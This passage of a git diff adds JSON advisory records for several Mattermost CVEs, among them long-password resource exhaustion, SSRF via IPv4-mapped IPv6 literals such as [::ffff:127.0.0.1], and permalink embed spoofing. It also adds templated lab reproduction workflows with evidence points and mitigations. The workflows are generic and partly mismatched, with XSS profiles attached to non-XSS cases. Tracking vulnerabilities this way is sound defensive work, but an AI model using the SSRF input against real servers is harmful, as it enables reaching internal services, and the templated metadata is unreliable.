"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260127144908-ced9a56e3988, introduced=0, fixed<5.3.2-0.20260127144908-ced9a56e3988, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260127144908-ced9a56e3988`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `xss` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
@@ -202,7 +221,7 @@
"source_kinds": [
"osv-batch"
],
"candidate_count": 1,
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-24458.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-24458",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to properly handle very long passwords",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to properly handle very long passwords, which allows an attacker to overload the server CPU and memory via executing login attempts with multi-megabyte passwords. Mattermost Advisory ID: MMSA-2026-00587",
"published_at": "2026-03-16T15:30:42Z",
"updated_at": "2026-03-23T18:56:03.732922Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24458",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-m5rv-56xx-hfc6",
"https://github.com/mattermost/mattermost/commit/7201f42d955f1bc44719b862132546626b60a180",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-24458",
"GO-2026-4731",
"GHSA-m5rv-56xx-hfc6"
],
"cve_ids": [
"CVE-2026-24458"
],
"ghsa_ids": [
"GHSA-m5rv-56xx-hfc6"
],
"osv_ids": [
"GHSA-m5rv-56xx-hfc6",
"GO-2026-4731"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260129164748-7201f42d955f",
"introduced=0, fixed<5.3.2-0.20260129164748-7201f42d955f",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260129164748-7201f42d955f",
"5.3.2-0.20260129164748-7201f42d955f",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-24458.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260129164748-7201f42d955f",
"introduced=0, fixed<5.3.2-0.20260129164748-7201f42d955f",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260129164748-7201f42d955f",
"5.3.2-0.20260129164748-7201f42d955f",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260129164748-7201f42d955f",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-24458",
"https://github.com/advisories/GHSA-m5rv-56xx-hfc6",
"https://github.com/mattermost/mattermost/commit/7201f42d955f1bc44719b862132546626b60a180",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260129164748-7201f42d955f",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260129164748-7201f42d955f",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260129164748-7201f42d955f",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260129164748-7201f42d955f",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260129164748-7201f42d955f"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-24458--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260129164748-7201f42d955f, introduced=0, fixed<5.3.2-0.20260129164748-7201f42d955f, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260129164748-7201f42d955f",
"introduced=0, fixed<5.3.2-0.20260129164748-7201f42d955f",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260129164748-7201f42d955f, introduced=0, fixed<5.3.2-0.20260129164748-7201f42d955f, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260129164748-7201f42d955f`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-24458--workflow"
}
}

233
08-threat-intel/registry/advisories/mattermost--CVE-2026-2455.json 普通文件
查看文件

@@ -0,0 +1,233 @@
{
"canonical_id": "mattermost--CVE-2026-2455",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to canonicalize IPv4-mapped IPv6 addresses before reserved IP validation",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to canonicalize IPv4-mapped IPv6 addresses before reserved IP validation which allows an attacker to perform SSRF attacks against internal services via IPv4-mapped IPv6 literals (e.g., [::ffff:127.0.0.1]).. Mattermost Advisory ID: MMSA-2026-00585",
"published_at": "2026-03-16T15:30:47Z",
"updated_at": "2026-03-23T18:56:08.125706Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2455",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-gqv7-j2j8-qmwq",
"https://github.com/mattermost/mattermost/commit/5d787969c2d5ab591a9dcd61b0810475eed7a646",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-2455",
"GO-2026-4746",
"GHSA-gqv7-j2j8-qmwq"
],
"cve_ids": [
"CVE-2026-2455"
],
"ghsa_ids": [
"GHSA-gqv7-j2j8-qmwq"
],
"osv_ids": [
"GHSA-gqv7-j2j8-qmwq",
"GO-2026-4746"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260129133647-5d787969c2d5",
"introduced=0, fixed<5.3.2-0.20260129133647-5d787969c2d5",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260129133647-5d787969c2d5",
"5.3.2-0.20260129133647-5d787969c2d5",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-2455.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"ssrf-url-validation",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260129133647-5d787969c2d5",
"introduced=0, fixed<5.3.2-0.20260129133647-5d787969c2d5",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260129133647-5d787969c2d5",
"5.3.2-0.20260129133647-5d787969c2d5",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260129133647-5d787969c2d5",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2455",
"https://github.com/advisories/GHSA-gqv7-j2j8-qmwq",
"https://github.com/mattermost/mattermost/commit/5d787969c2d5ab591a9dcd61b0810475eed7a646",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260129133647-5d787969c2d5",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260129133647-5d787969c2d5",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260129133647-5d787969c2d5",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260129133647-5d787969c2d5",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260129133647-5d787969c2d5"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-2455--workflow",
"vuln_family": "ssrf",
"entry_surface": "remote-fetch-or-webhook-endpoint",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260129133647-5d787969c2d5, introduced=0, fixed<5.3.2-0.20260129133647-5d787969c2d5, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "editor-or-admin",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260129133647-5d787969c2d5",
"introduced=0, fixed<5.3.2-0.20260129133647-5d787969c2d5",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `ssrf` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/webhook/test",
"/remote-fetch",
"/import-url"
],
"input_shape": "\u63d0\u4ea4\u53d7\u63a7\u56de\u73af\u6216\u54e8\u5175 URL\uff0c\u9a8c\u8bc1\u534f\u8bae\u3001\u4e3b\u673a\u3001IP \u4e0e\u91cd\u5b9a\u5411\u9650\u5236\u3002",
"expected_unsafe_behavior": "\u670d\u52a1\u7aef\u5411\u53d7\u63a7\u76ee\u6807\u53d1\u8d77\u975e\u9884\u671f\u8bf7\u6c42\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260129133647-5d787969c2d5, introduced=0, fixed<5.3.2-0.20260129133647-5d787969c2d5, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260129133647-5d787969c2d5`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `ssrf` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-2455--workflow"
}
}

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-2457.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-2457",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost allows attackers to spoof permalink embeds",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to sanitize client-supplied post metadata which allows an authenticated attacker to spoof permalink embeds impersonating other users via crafted PUT requests to the post update API endpoint. Mattermost Advisory ID: MMSA-2025-00569",
"published_at": "2026-03-16T15:30:42Z",
"updated_at": "2026-03-23T18:56:18.286997Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2457",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-ph22-fw5m-w2q9",
"https://github.com/mattermost/mattermost/commit/9efe617be8b8f1d036e12721e8e73b69a543ed34",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-2457",
"GO-2026-4732",
"GHSA-ph22-fw5m-w2q9"
],
"cve_ids": [
"CVE-2026-2457"
],
"ghsa_ids": [
"GHSA-ph22-fw5m-w2q9"
],
"osv_ids": [
"GHSA-ph22-fw5m-w2q9",
"GO-2026-4732"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260123211116-9efe617be8b8",
"introduced=0, fixed<5.3.2-0.20260123211116-9efe617be8b8",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260123211116-9efe617be8b8",
"5.3.2-0.20260123211116-9efe617be8b8",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-2457.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260123211116-9efe617be8b8",
"introduced=0, fixed<5.3.2-0.20260123211116-9efe617be8b8",
"introduced=10.11.0-rc1, fixed<10.11.11",
